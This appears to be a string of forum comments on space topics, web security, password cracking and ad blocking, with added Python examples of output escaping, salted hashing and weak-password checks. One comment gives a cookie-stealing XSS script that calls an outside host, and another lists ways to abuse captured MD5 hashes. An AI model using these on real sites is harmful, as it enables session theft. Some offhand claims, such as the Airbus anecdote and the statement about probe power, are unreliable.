Re:Why we stopped going to the moon (on The Case for the Moon) · Score: 3, Informative
I keep hearing this, but somehow no-one has EVER demonstrated a working system. If microwave power transmission is such a panacea, how come we have never seen it done here on earth!!!!!!
Because microwave transmission is line-of-sight, so you can't use it on Earth for distances longer than about fifty miles, and it's cheaper to use copper wire for runs that short.
Re:Minor factual error: no "darkside" of the moon (on The Case for the Moon) · Score: 1
For radio astronomy, the far side is the dark side.
I'm speaking from personal experience here. Three weeks to brute-force all seven-character passwords from a set of 30 MD5-encoded passwords.
What if the intended target server is using https? Would the grabbing script {presumably ordinary http} get the encrypted or the plaintext version? If the browser thinks it's sending the form via https, then it has no reason to send out the unencrypted version - does it?
The big threat from XSS is that, assuming the site isn't using secure cookies, it doesn't matter if the browser and site are using HTTP or HTTPS -- an XSS attack will still be able to grab cookies or session IDs.
A basic XSS attack might look like
<script>document.write('<img src="http://my.site.com/pixel.gif?' + document.cookie + '">')</script>
which would send any cookies set by the site off to a third party.
If you inject the script into something that saves data across sessions (like a guestbook or forum), you'll hit yourself -- and everyone else who views the page!
The biggest problem is figuring out what data needs to be escaped, and how. For example, did you know that you can place a working onMouseClick javascript in a tag? Instant "hyperlink"! What about in an tag? What attributes will you allow in an tag? How are you going about converting those [i] BBCode tags? Can someone sneak code in that way?
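The two comments above make one point from two sides: a script that can run in the page can read document.cookie (the HttpOnly cookie attribute is what denies it that read; the Secure attribute only keeps the cookie off plain HTTP), and the reason such a script gets into a guestbook or forum page is that user text was turned into markup without being escaped first. The following is an added example, not code from the original comments: a minimal BBCode renderer that escapes everything and then converts only a whitelisted pair of tags, shown beside the convert-without-escaping version that lets the script through. The tag whitelist and the helper names are assumptions for illustration.

```python
import html
import re

# Assumed policy: only these BBCode tags are honoured, mapped to attribute-free HTML.
BBCODE_TAGS = {"b": "strong", "i": "em"}


def _convert_bbcode(text: str) -> str:
    """Replace [b]..[/b] and [i]..[/i] with the HTML elements we generate ourselves.
    Only the exact forms '[b]' and '[i]' match: a tag carrying attributes such as
    '[b onclick=...]' is left as literal text and never becomes markup."""
    for tag, element in BBCODE_TAGS.items():
        pattern = re.compile(r"\[%s\](.*?)\[/%s\]" % (tag, tag), re.IGNORECASE | re.DOTALL)
        text = pattern.sub(lambda m, e=element: "<%s>%s</%s>" % (e, m.group(1), e), text)
    return text


def render_bbcode_only(text: str) -> str:
    """The defective version: converts BBCode but never escapes, so any HTML the
    user typed (a <script> tag, an <img onerror=...>) reaches the browser intact."""
    return _convert_bbcode(text)


def render_user_text(text: str) -> str:
    """Escape first, then convert. After html.escape the input contains no '<', '>',
    '&' or quote characters, so the only markup in the output is what _convert_bbcode
    emitted from the whitelist."""
    return _convert_bbcode(html.escape(text, quote=True))


if __name__ == "__main__":
    # Constructed sample posts, the kind of thing a guestbook would receive.
    for post in ("[i]hello[/i] world",
                 "<script>alert(1)</script>",
                 "[i]<img src=x onerror=alert(1)>[/i]",
                 '[b onclick="x"]hi[/b]'):
        print("unsafe:", render_bbcode_only(post))
        print("safe:  ", render_user_text(post))
```

The order of the two steps is the whole point: escaping after conversion would mangle the renderer's own tags, while converting without escaping is the guestbook hole the comment describes. Any BBCode that takes a parameter (a URL, a colour) needs its own validation of that parameter before it is placed in an attribute, since escaping alone does not stop a javascript: URL.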
Just because a password is MD5-encoded doesn't mean it's useless.
1) You can put the user ID and MD5-encoded password in your own cookies, and log in as the user.
2) You can find another site that user logs in on, find their user ID, and use the captured MD5 password to log in as them -- people tend to use the same password in many places.
3) You can feed the MD5 password into a password cracker. If it's in a dictionary, you'll get the cleartext version in seconds; brute-forcing all possible 7-character passwords only takes a few weeks.
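Points 1 and 2 above both follow from one property of unsalted MD5: the stored value is a pure function of the password, so it is the same on every site that uses the scheme, and a copy of it is as good as the password wherever it is compared directly. The following added example (not code from the original comment) contrasts that with a per-user random salt and a deliberately slow derivation, PBKDF2-HMAC-SHA256 from the Python standard library, under which two sites storing the same password hold unrelated digests. The sample password and the two-site simulation are constructed for illustration.

```python
import hashlib
import hmac
import os

# Constructed sample value; stands in for a password one person reuses on two sites.
SHARED_PASSWORD = "hunter2"


def md5_hex(password: str) -> str:
    """Unsalted MD5 as the commenter describes: the same password always yields the
    same 32-hex-digit value, on every site that stores passwords this way."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_record(password: str, iterations: int = 200_000) -> dict:
    """Per-user random salt plus a slow derivation (PBKDF2-HMAC-SHA256).
    Returns the record a site would store in place of a bare hash."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "digest": digest.hex()}


def pbkdf2_verify(record: dict, password: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["digest"])


def cross_site_reuse(password: str) -> dict:
    """Simulate two unrelated sites each storing the same user's password.
    With MD5 the stored values are identical, so a value captured from one site
    identifies the account on the other and, once cracked, gives the password for both.
    With salted PBKDF2 the two digests differ and neither helps against the other site."""
    site_a_md5, site_b_md5 = md5_hex(password), md5_hex(password)
    site_a_rec, site_b_rec = pbkdf2_record(password), pbkdf2_record(password)
    return {
        "md5_identical": site_a_md5 == site_b_md5,
        "pbkdf2_identical": site_a_rec["digest"] == site_b_rec["digest"],
    }


if __name__ == "__main__":
    print("md5:", md5_hex(SHARED_PASSWORD))
    rec = pbkdf2_record(SHARED_PASSWORD)
    print("pbkdf2 record:", rec)
    print("verify correct:", pbkdf2_verify(rec, SHARED_PASSWORD))
    print("verify wrong:  ", pbkdf2_verify(rec, SHARED_PASSWORD + "x"))
    print(cross_site_reuse(SHARED_PASSWORD))
```

The salt defeats point 2 (a captured value is tied to one site and one account) and the iteration count raises the per-guess cost of point 3 by orders of magnitude; point 1 is defeated separately, by never letting a client present the stored value itself as proof of identity (a random session identifier in the cookie, the password only at login).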
My extrapolation isn't correct. I fit a line to the last two data points, when I probably should have fit a logarithmic curve to all three points. That's not to say there isn't a limit -- it's just that my prediction is going about it the wrong way.
From the article:
150 nm, 382 GHz
100 nm, 452 GHz
75 nm, 509 GHz
At their current rate of improvement, a 680 GHz device will have a collector size of 0 nm. Just imagine what will happen once they manage negative sizes!
According to your list, it should be targeting the "low speed, long range" niche.
Only a million? Bluetooth is DEAD!
No mention of how this guy compares to the Australian who was arrested about a week back. I bet he's small potatoes as well.
The ones they should be going after are the ones in Nigeria -- the scam is the third largest source of foreign currency for that country.
I wonder if the same logic could be applied to charge spammers advertising spam blockers with extortion? How about HTML popup ads for popup blockers?
In general, if someone has the ability to run a dictionary attack on a password, it's as good as giving them access. From personal experience as a sysadmin, 65%-75%(1) of all passwords can be found by a dictionary attack.
(1) From running dictionary attacks against three sets of passwords.
Computer science students: 75%
Public forum #1: 65%
Public forum #2: 75%
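If two thirds of a password set falls to a dictionary run, the cheapest defence is to refuse dictionary passwords at the moment they are set, and to do so with the same normalisations a cracker's rule set applies (case folding, stripping digits and punctuation from the ends, undoing leet substitutions), since "Dr@gon2024" is "dragon" to a cracker. The following is an added example, not code from the original comment: a policy check that reports why a candidate password would fall to such a run, and a helper that reproduces the comment's percentage over a constructed sample. The word list and substitution table are small constructed stand-ins.

```python
import re

# Constructed mini word list; a real check loads a large dictionary file.
WORDLIST = {"password", "letmein", "dragon", "monkey", "welcome", "sunshine", "qwerty"}

# Typical substitutions a rule-based cracker undoes (assumed, illustrative set).
LEET = str.maketrans("@$!0134", "asiolea")

# Digits, punctuation and underscores at either end, e.g. the "2024" in "dragon2024".
EDGE_JUNK = re.compile(r"^[\W\d_]+|[\W\d_]+$")


def candidate_base_words(password: str):
    """Yield the plain words a cracker's rules would recover from this password."""
    lowered = password.lower()
    stripped = EDGE_JUNK.sub("", lowered)
    for form in (lowered, stripped, lowered.translate(LEET), stripped.translate(LEET)):
        yield form


def rejection_reason(password: str, wordlist=WORDLIST, min_len: int = 8):
    """Return None if the password passes, otherwise a short reason for rejecting it."""
    if len(password) < min_len:
        return "too short"
    for word in candidate_base_words(password):
        if word in wordlist:
            return "dictionary word: %s" % word
    return None


def weak_fraction(passwords) -> float:
    """Share of a password set that the check would have refused; the figure the
    commenter measured after the fact by cracking, measured here before storage."""
    rejected = sum(1 for p in passwords if rejection_reason(p) is not None)
    return rejected / len(passwords)


if __name__ == "__main__":
    # Constructed sample set, not the commenter's data.
    sample = ["Dr@gon2024", "Letmein!!", "Sunshine9", "correct horse battery staple"]
    for p in sample:
        print("%-30s %s" % (p, rejection_reason(p)))
    print("weak fraction:", weak_fraction(sample))
```

A check of this shape runs at registration and password change only, so its word list can be far larger than the one above without any cost at login time.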
Good grief, you can get a DEDICATED SERVER with over 42 GB of transfer per month (which you can spread over a year to average it out) FOR LESS THAN 30 UKP A MONTH! [and extra transfer is 1 UKP per GB].
Thank you for proving my point. Translating into US$, that's 42GB/month for about $45 a month -- $1 per GB.
He was complaining that the new Airbuses actually land the plane for you -- the pilot only has to land every 10 or 12 times to make sure he remembers how.
And this is why I won't ride on an Airbus plane -- the autopilot can override the pilot.
About a decade back, there was an incident where an Airbus plane made a nice, perfectly controlled descent towards a Boston neighborhood, three miles from the airport. The pilot realized that the airplane was going to land short of the runway, and took over manual control of the landing. But the autopilot wouldn't let him land at the airport -- it thought he was overshooting the runway by three miles! After a few tries, the pilot was forced to land at a different airport -- one that the airplane was willing to admit existed.
I can't think of 2 people that -- honestly -- would NOT block ads and banners if it was just a click away.
Right off hand, I can think of one -- me.
I figure sites have the right to try to support themselves, as long as they don't do so in too annoying a fashion.
Java-based ads are out, since badly-written ones can bring a computer to a grinding halt (anyone remember "shock the monkey" and "punch the monkey"? Two of those on a page could slow a computer to unusability). Javascript-based ads are out for similar reasons -- ever tried to use a web page when an ad was insisting on keeping itself under your mouse pointer? Pop-ups are out, since I'll never click on one, and pop-unders are out because they don't appear under the parent window, they bring the parent to the front (quite annoying if you're letting a large web page load in the background).
Animated GIFs and (reasonable) Flash are just fine. I've even clicked on a few, but ads for stuff I'm interested in are few and far between.
I'm a computer programmer. I can assure you, the average computer user is a total blockhead.
A few good assumptions to make when designing software:
1) Set the defaults to something useful. 90% of users will never change them, and 75% don't even know what a "preferences" dialog is.
2) Make clicking "Yes" the safe option. Users frequently don't read dialog boxes.
3) Don't give users any decision more complicated than a three-way choice, and if possible, make it a binary (on-off) choice. Anything more complicated just increases tech support calls.
Guess what? Most people won't even realize that the ad blocking is on, and even fewer will realize they can turn it off.
Could you provide us with a link to this study, please? Particularly for that last point.
So, how do you propose to pay for web hosting and bandwidth?
A good webhosting provider will run $1/month/100MB of space, and $1-$2/GB of transfer. If they're charging less, don't expect any sort of reliability.
For an effectively untargeted advertising medium, that's actually pretty good.
Because this particular product comes pre-installed (and presumably pre-activated) on many computers. Every other ad blocker has been something you need to actively decide to install on your computer.
No one knows how far the Oort cloud extends. The best estimates I've seen are that it extends halfway to the next star, at which point it becomes that star's Oort cloud.
Every probe that's gone past Mars has used nuclear thermal power. Solar panels don't produce enough power out beyond Mars orbit.
The problem is that 100 years is 98 years farther ahead than Congress is able to think, and 99 years longer than they are able to guarantee money for.
About 0.00143 light-years (or 12.5 light-hours).